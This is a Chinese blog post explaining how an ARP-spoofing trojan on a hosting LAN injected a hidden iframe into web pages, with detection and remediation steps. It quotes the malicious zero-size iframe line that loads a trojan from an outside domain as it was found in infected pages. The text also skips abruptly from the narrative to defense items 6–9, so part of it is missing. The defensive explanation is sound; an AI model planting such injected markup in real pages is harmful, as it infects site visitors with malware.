• ARP欺骗病毒,网页“篡改”,注入iframe代码!


    ---------------权威资料看这里---------------

    清华大学信息网络工程研究中心-中国教育和科研计算机网应急响应组
    《ARP 欺骗网页劫持攻击分析》PDF文件,直接IE打开或者另存为查看http://202.203.128.31/manage/upload/attach/11975323420.pdf

    ---------------民间资料看这里---------------

    网 站突然出现访问迟钝,并且打开之后杀毒软件立即提示含有木马病毒,IE提示下载安装Microsoft Data Access...信息。从IE查看页面的源代码,在网页的源代码中加入了<iframe src=http://xf.jebooo.com/t.htm width=0
    height=0></iframe> 嵌套框架网页,该网页执行木马程序......

    所以估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,但下载文件下来查看却没有该代码。怎么回事呢?原来是机房局域网中有服务器中ARP病毒了,模拟网关进行欺骗,拦截Http数据包自动加入iframe代码。

    那么什么是"ARP欺骗"呢?

    首先,ARP的意思是Address Resolution Protocol(地址解析协议),它是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。

    从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。

    第一种ARP欺骗的原理是----截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC

    无法收到信息。

    第二种ARP欺骗的原理是----伪造网关,ARP网关欺骗。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,"网络掉线了"。

    ARP欺骗木马只需成功感染一台电脑,就可能导致整个局域网都无法上网,严重的甚至可能带来整个网络的瘫痪。

    而本次我的网站服务器所在的托管机房同一局域网中的某台服??设置好你的路由,确保ip地址能到达合法的路径。(静态配置路由ARP条目),注意,使用交换集线器和网桥无法阻止ARP欺骗。
    7、管理员定期用响应的ip包中获得一个rarp请求,然后检查ARP响应的真实性。
    8、管理员定期轮询,检查主机上的ARP缓存。
    9、使用防火墙连续监控网络。注意有使用SNMP的情况下,ARP的欺骗有可能导致陷阱包丢失。


    解决方案:

    1、针对中毒服务器
    检查服务器是否中了ARP欺骗木马病毒
    "CTRL"+"ALT"+"Delete"键打开"Windows任务管理器"窗口,查看有没有"MIR0.dat"的进程,如果有,表示中毒了,需要立即"结束该进程"。
    其他变种要安装最新的杀毒软件或专杀工具查杀。

    2、针对受影响服务器

    检查局域网内感染ARP欺骗木马病毒的计算机

    "开始"菜单"运行""cmd"打开MSDOS窗口,输入"ipconfig"获得"Default Gateway"默认网关。

    继续执行命令"arp -a",查看默认网关IP对应的"Physical Address"值,在网络正常时这就是网关的正确物理地址,在网络受" ARP 欺骗"木马影响而不正常时,它就是木马所在计算机的网卡物理地址。也可以扫描本子网内

    的全部IP地址,然后再查ARP表。如果有一个 IP 对应的物理地址与网关的相同,那么这个IP地址和物理地址就是中毒计算机的IP地址和网卡物理地址。


    安装一个arp防火墙也可以防.

    可以用360安全卫士自带的ARP病毒防火墙。

    ARP防火墙通过在系统内核层拦截虚假ARP数据包以及主动通告网关本机正确的MAC地址,可以保障数据流向正确,不经过第三者,从而保证通讯数据安全、保证网络畅通、保证通讯数据不受第三者控制,从而完美的解决上述所有问

    题。

        ARP防火墙九大功能
        1. 拦截ARP攻击。
            (A) 在系统内核层拦截外部虚假ARP数据包,保障系统不受ARP欺骗、ARP攻击影响,保持网络畅通及通讯安全;
            (B) 在系统内核层拦截本机对外的ARP攻击数据包,以减少感染恶意程序后对外攻击给用户带来的麻烦;
        2. 拦截IP冲突。在系统内核层拦截IP冲突数据包,保障系统不受IP冲突攻击的影响;
        3. Dos攻击抑制。在系统内核层拦截本机对外的TCP SYN/UDP/ICMP/ARP DoS攻击数据包,定位恶意发动DoS攻击的程序,从而保证网络的畅通;
        4. 安全模式。除了网关外,不响应其它机器发送的ARP Request,达到隐身效果,减少受到ARP攻击的几率;
        5. ARP数据分析。分析本机接收到的所有ARP数据包,掌握网络动态,找出潜在的攻击者或中毒的机器;
        6. 监测ARP缓存。自动监测本机ARP缓存表,如发现网关MAC地址被恶意程序篡改,将报警并自动修复,以保持网络畅通及通讯安全;
        7. 主动防御。主动与网关保持通讯,通告网关正确的MAC地址,以保持网络畅通及通讯安全;
        8. 追踪攻击者。发现攻击行为后,自动快速锁定攻击者IP地址;
        9. 查杀ARP病毒。发现本机有对外攻击行为时,自动定位本机感染的恶意程序、病毒程序;

    3、针对网站访问者

    网站访问者在网站解决ARP病毒前没有别的方式,但是如果非要访问该网站的话,千万不能执行下载安装任何插件ActiveX,并且可以把那个恶意网站加入Hosts文件。

    查找系统的hosts文件所在目录,Windows 2003在%windir%system32driversetchosts目录下

    首先查看源文件找到iframe嵌入的网站域名

    在该文件中加入一行
    127.0.0.1 xf.jebooo.com

    如果hosts存取拒绝,可以

    使用方法:
    开始==》运行==》输入cmd后回车==》复制代码框内容到CMD窗口,回车执行。

    attrib -r -a -s -h %windir%system32driversetchosts
    去掉文件属性,然后再修改
  • 相关阅读:
    万豪酒店数据库遭入侵 5亿顾客信息或泄露
    网络信息安全中最热门的果然是它
    有奖问卷调查丨你有意见?可以提啊!
    业务逻辑漏洞探索之绕过验证
    一个月薪两万的Web安全工程师要掌握哪些技能?
    phpcms2008远程代码执行漏洞
    BASE64编码原理分析脚本实现及逆向案例
    源码级调试的XNU内核
    使用RSA加密在Python中逆向shell
    感恩节活动中奖名单 i春秋喊你领礼物啦!
  • 原文地址:https://www.cnblogs.com/sandea/p/3293699.html
Copyright © 2020-2023  润新知